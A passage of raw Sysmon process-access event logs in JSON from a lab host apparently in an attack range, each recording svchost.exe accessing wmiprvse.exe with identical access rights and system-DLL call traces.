C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 